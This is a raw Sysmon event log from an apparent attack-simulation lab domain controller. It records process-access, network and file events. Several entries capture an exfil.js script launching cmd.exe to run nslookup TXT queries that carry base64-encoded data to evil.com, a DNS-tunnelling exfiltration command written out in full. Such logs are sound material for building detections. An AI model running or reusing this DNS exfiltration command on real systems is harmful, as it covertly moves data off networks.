14:21:49.404{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.404{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.404{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.404{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.404{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1A46-000000005F02}7172C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.404{2E1864BB-18FD-629A-1846-000000005F02}26925816C:\Windows\system32\cmd.exe{2E1864BB-18FD-629A-1A46-000000005F02}7172C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.418{2E1864BB-18FD-629A-1A46-000000005F02}7172C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FD-629A-1846-000000005F02}2692C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmac.tmp 2>&1 10341000x8000000000000000214993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.398{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1946-000000005F02}4128C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.398{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FD-629A-1946-000000005F02}4128C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.382{2E1864BB-18FD-629A-1946-000000005F02}41287156C:\Windows\system32\conhost.exe{2E1864BB-18FD-629A-1846-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.837{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51246- 354300x8000000000000000214989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.837{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51245- 354300x8000000000000000214988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.836{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51244- 354300x8000000000000000214987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.766{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51243- 354300x8000000000000000214986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.766{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51242- 354300x8000000000000000214985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.766{00000000-0000-0000-0000-000000000000}6680<unknown process>-udptruefalse127.0.0.1-51242-false127.0.0.1-53domain 354300x8000000000000000214984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.766{00000000-0000-0000-0000-000000000000}6680<unknown process>-udpfalsefalse127.0.0.1-51241-false127.0.0.1-53domain 354300x8000000000000000214983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.766{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51241- 354300x8000000000000000214982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.765{00000000-0000-0000-0000-000000000000}6680<unknown process>-udptruefalse127.0.0.1-51241-false127.0.0.1-53domain 354300x8000000000000000214981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.695{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-51240-false127.0.0.1-53domain 354300x8000000000000000214980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.695{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51240- 354300x8000000000000000214979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.695{00000000-0000-0000-0000-000000000000}5552<unknown process>-udptruefalse127.0.0.1-51240-false127.0.0.1-53domain 354300x8000000000000000214978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.695{00000000-0000-0000-0000-000000000000}5552<unknown process>-udpfalsefalse127.0.0.1-51239-false127.0.0.1-53domain 10341000x8000000000000000214977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.366{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1946-000000005F02}4128C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000214976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.695{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51239- 354300x8000000000000000214975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.695{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51238- 354300x8000000000000000214974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.611{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51237- 354300x8000000000000000214973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.610{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51236- 354300x8000000000000000214972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.610{00000000-0000-0000-0000-000000000000}5896<unknown process>-udpfalsefalse127.0.0.1-51235-false127.0.0.1-53domain 354300x8000000000000000214971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.610{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51235- 354300x8000000000000000214970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.609{00000000-0000-0000-0000-000000000000}5896<unknown process>-udptruefalse127.0.0.1-51235-false127.0.0.1-53domain 354300x8000000000000000214969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51234- 354300x8000000000000000214968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51233- 10341000x8000000000000000214967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.366{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.366{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.366{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.366{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.351{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FD-629A-1846-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.351{2E1864BB-18E0-629A-6742-000000005F02}39762404C:\Windows\System32\WScript.exe{2E1864BB-18FD-629A-1846-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000214961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.537{00000000-0000-0000-0000-000000000000}7864<unknown process>-udpfalsefalse127.0.0.1-51232-false127.0.0.1-53domain 154100x8000000000000000214960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.365{2E1864BB-18FD-629A-1846-000000005F02}2692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmac.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000214959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51232- 354300x8000000000000000214958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.537{00000000-0000-0000-0000-000000000000}7864<unknown process>-udptruefalse127.0.0.1-51232-false127.0.0.1-53domain 354300x8000000000000000214957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.463{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-51231-false127.0.0.1-53domain 354300x8000000000000000214956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51231- 354300x8000000000000000214955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-51231-false127.0.0.1-53domain 354300x8000000000000000214954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-51230-false127.0.0.1-53domain 354300x8000000000000000214953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51230- 354300x8000000000000000214952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-51230-false127.0.0.1-53domain 354300x8000000000000000214951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{00000000-0000-0000-0000-000000000000}5928<unknown process>-udpfalsefalse127.0.0.1-51229-false127.0.0.1-53domain 354300x8000000000000000214950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51229- 354300x8000000000000000214949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.462{00000000-0000-0000-0000-000000000000}5928<unknown process>-udptruefalse127.0.0.1-51229-false127.0.0.1-53domain 354300x8000000000000000214948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.406{00000000-0000-0000-0000-000000000000}2812<unknown process>-udpfalsefalse127.0.0.1-51228-false127.0.0.1-53domain 354300x8000000000000000214947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.406{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51228- 354300x8000000000000000214946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.406{00000000-0000-0000-0000-000000000000}2812<unknown process>-udptruefalse127.0.0.1-51228-false127.0.0.1-53domain 354300x8000000000000000214945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.406{00000000-0000-0000-0000-000000000000}2812<unknown process>-udpfalsefalse127.0.0.1-51227-false127.0.0.1-53domain 354300x8000000000000000214944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.406{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51227- 354300x8000000000000000214943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.405{00000000-0000-0000-0000-000000000000}2812<unknown process>-udptruefalse127.0.0.1-51227-false127.0.0.1-53domain 354300x8000000000000000214942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.405{00000000-0000-0000-0000-000000000000}2812<unknown process>-udpfalsefalse127.0.0.1-51226-false127.0.0.1-53domain 23542300x8000000000000000214941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.351{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfqyfzs.tmpMD5=88CB44002509C6BB2D4BC0ADC4A5E028,SHA256=FA57CD8CDA118516C9A4FB97A60BCAFFDFC289CB501CF1DABE54CCC933EB8213,IMPHASH=00000000000000000000000000000000falsetrue 